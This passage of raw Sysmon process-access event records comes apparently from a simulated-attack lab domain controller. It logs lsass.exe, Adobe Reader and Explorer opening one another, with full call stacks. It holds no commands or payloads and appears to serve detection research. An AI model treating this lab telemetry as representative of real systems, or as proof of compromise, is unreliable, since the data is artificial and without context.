DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11 10341000x800000000000000046654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11 10341000x800000000000000046645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.333{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.332{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.332{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.331{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.331{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.331{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader 